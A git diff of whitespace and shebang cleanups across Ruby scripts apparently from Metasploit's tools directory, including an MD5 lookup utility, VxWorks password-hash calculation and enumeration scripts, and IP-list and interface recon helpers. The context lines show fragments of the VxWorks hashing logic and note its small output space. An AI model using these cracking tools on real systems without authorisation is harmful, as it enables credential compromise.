end - # Returns the actual database names based on what the user wants # # @param list [String] A list of user-supplied database names @@ -339,7 +326,6 @@ module Md5LookupUtility new_db_list end - # Returns a list of all of the supported database symbols # # @return [Array] Database symbols @@ -357,7 +343,6 @@ module Md5LookupUtility end end - # This class decides how this process works class Driver @@ -379,7 +364,6 @@ module Md5LookupUtility end end - # Main function # # @return [void] @@ -403,7 +387,6 @@ module Md5LookupUtility end end - # Cleans up the output file handler if exists # # @return [void] @@ -411,10 +394,8 @@ module Md5LookupUtility @output_handle.close if @output_handle end - private - # Saves the MD5 result to file # # @param result [Hash] The result that contains the MD5 information @@ -472,7 +453,6 @@ module Md5LookupUtility end - # # main # diff --git a/tools/password/vxencrypt.rb b/tools/password/vxencrypt.rb index f9d709ee55..109e7bf5cd 100755 --- a/tools/password/vxencrypt.rb +++ b/tools/password/vxencrypt.rb @@ -1,3 +1,5 @@ +#!/usr/bin/env ruby +# # $Id$ # # This script can be used to calculate hash values for VxWorks passwords. @@ -15,7 +17,6 @@ def hashit(inp) hackit(sum) end - def hackit(sum) magic = 31695317 res = ((sum * magic) & 0xffffffff).to_s @@ -29,4 +30,3 @@ end input = ARGV.shift || "flintstone" $stderr.puts "[*] Hash for password '#{input}' is #{hashit(input)}" - diff --git a/tools/password/vxmaster.rb b/tools/password/vxmaster.rb index e599b91be0..7521f48801 100755 --- a/tools/password/vxmaster.rb +++ b/tools/password/vxmaster.rb @@ -12,7 +12,6 @@ # $Revision$ # - # VxWorks converts the clear-text password into single integer value. This value # can only be one of about 210,000 possible options. The method below emulates # what the vxencrypt utility does and was implemented based on publicly indexed @@ -128,7 +127,6 @@ seeds = [] end seedsets << seeds - seeds = [] 8.upto(12) do |slen| 0x23.upto(0x7c) do |cset| @@ -165,7 +163,6 @@ seeds = [] end seedsets << seeds - # Calculate passwords and their hashes for all possible outputs 1.upto(209656) do |i| found = false @@ -200,4 +197,3 @@ seedsets << seeds exit(0) end end - diff --git a/tools/recon/list_interfaces.rb b/tools/recon/list_interfaces.rb index c2dcc3e58e..0cf1fb2169 100755 --- a/tools/recon/list_interfaces.rb +++ b/tools/recon/list_interfaces.rb @@ -19,7 +19,6 @@ require 'msfenv' $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] - if RUBY_PLATFORM == "i386-mingw32" begin require 'network_interface' diff --git a/tools/recon/makeiplist.rb b/tools/recon/makeiplist.rb index fd3f8dc97b..912fbdeddf 100755 --- a/tools/recon/makeiplist.rb +++ b/tools/recon/makeiplist.rb @@ -12,18 +12,17 @@ # mubix # - msfbase = __FILE__ while File.symlink?(msfbase) msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) end $:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib'))) + require 'msfenv' require 'rex' require 'optparse' - class OptsConsole def self.parse(args) options = {'output' => 'iplist.txt'} @@ -78,7 +77,6 @@ Usage: #{__FILE__} [options]| end end - # # Prints IPs # @@ -91,7 +89,6 @@ def make_list(in_f, out_f) end end - # # Returns file handles # @@ -106,7 +103,6 @@ def load_files(in_f, out_f) return handle_in, handle_out end - options = OptsConsole.parse(ARGV) in_f, out_f = load_files(options['input'], options['output'])